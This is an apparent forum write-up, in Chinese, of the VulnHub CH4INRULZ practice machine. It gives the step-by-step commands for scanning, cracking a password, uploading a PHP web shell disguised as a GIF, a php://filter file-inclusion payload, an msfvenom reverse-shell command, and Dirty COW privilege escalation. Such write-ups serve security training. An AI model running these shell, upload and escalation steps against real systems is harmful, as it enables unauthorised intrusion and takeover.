自由的羽毛 发表于 2024-2-18 17:24:38

vulnhub CH4INRULZ靶场

1.信息收集

扫描主机
sudo arp-scan -l
https://s2.loli.net/2023/12/14/hTkGFBzsVcbrP5X.png
扫描端口
nmap -p- 192.168.42.151
https://s2.loli.net/2023/12/14/NGLgnw8SvZYBpTI.png
查看端口服务
nmap -A -sV -p 21,22,80,8011
https://s2.loli.net/2023/12/14/g7382BDwiFuRm4y.png
https://s2.loli.net/2023/12/14/5HcfDJE9Gxpb2eN.png
21端口 ftp 没有有效信息,所以重点在80,8011
2.漏洞挖掘

开始网站浏览
https://s2.loli.net/2023/12/14/qSzspjlEg514C8Q.png
没找到有用信息,开始网站目录搜索(因为默认为80端口,所以我们要扫描8011端口)
dirb http://192.168.42.151
dirb http://192.168.42.151:8011
https://s2.loli.net/2023/12/14/yaSoZqnDkMYI12F.png
https://s2.loli.net/2023/12/14/85eFIhWXTJtbVCB.png
dirb http://192.168.42.151 -X .bak
https://s2.loli.net/2023/12/14/KtDd3Y1X2cLyFJx.png
查看源代码,发现敏感目录,登录账号
cat index.html.bak
192.168.42.151/development/
https://s2.loli.net/2023/12/14/t1djTWUl9Q42XyV.png
发现密码格式不对,暴力破解密码成功
john 1.txt
https://s2.loli.net/2023/12/14/zwZGXKT1CbsWIdN.png
登录deve界面,读题发现上传。
https://s2.loli.net/2023/12/14/zt41xITA5VkpNJe.png
访问/api页面,发现文件包含漏洞,尝试利用
https://s2.loli.net/2023/12/14/rt1G9h4CTdvsXMm.png
get型的利用被WAF了
https://s2.loli.net/2023/12/14/Ks3tchDxXuy6qM5.png
3.漏洞利用

找到上传口
192.168.42.151/development/uploader/
https://s2.loli.net/2023/12/14/Qo79hK4dMmsw1Ei.png
3.1msf生成php木马

msfvenom -p php/reverse_php lhost=192.168.42.151 lport=8888 -o shell.php
是反弹shell,写自己地址
https://s2.loli.net/2023/12/14/NqGe3sxCvjYKA7z.png
3.2kali自带的php木马

/usr/share/webshells/php/
https://s2.loli.net/2023/12/14/Bm1s5TIhpSPOzlJ.png
改前面GIF98,后缀.gif
https://s2.loli.net/2023/12/14/JsRTvcnQWi3e5Gt.png
木马上传成功
https://s2.loli.net/2023/12/14/khN13icjGeMLEp5.png
找不到上传路径,继续文件包含
https://s2.loli.net/2023/12/14/TXIzwAO8BuGDLMZ.png
尝试读取源代码
php伪协议
尝试读取源代码
file=php://filter/convert.base64-encode/resource=/var/www/development/uploader/upload.php
https://s2.loli.net/2023/12/14/2b1ZE5apNwBgTXl.png
得到源代码,发现上传路径
用文件包含目录调用木马
file=/var/www/development/uploader/FRANKuploads/shell.gif
https://s2.loli.net/2023/12/14/fDqOUpzSciyYWxa.png
反弹shell
https://s2.loli.net/2023/12/14/djE61HVqa7iwucz.png
4.提升权限

查看内核版本,内核提权
uname -a
https://s2.loli.net/2023/12/14/dy9jSos1EA6khZY.png
在漏洞库中查找(脏牛提权)
searchsploit dirty
https://s2.loli.net/2023/12/14/fB7boqCDlM2Zj5H.png
下载提权脚本
searchsploit -m linux/local/40839.c
https://s2.loli.net/2023/12/14/1akMBuir8KLJFxf.png
上传脚本(nc 上传)
攻击机
https://s2.loli.net/2023/12/14/tyxpMJN48mGCvfo.png
受害机
https://s2.loli.net/2023/12/14/lH3Q4PpNmZTEjJi.png
在受害机编译脚本
gcc -pthread dirty.c -o dirty -lcrypt
https://s2.loli.net/2023/12/14/q5Bm8oIr6ftWwk7.png
执行脚本(可以先看看有没有执行权限)
./dirty 123456
看见firefart用户就成功
https://s2.loli.net/2023/12/14/pH1C6qjbIi7XU4M.png
提权成功
su firefart
https://s2.loli.net/2023/12/14/IUmRu4FDeaZ8PqV.png

免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!
页: [1]
查看完整版本: vulnhub CH4INRULZ靶场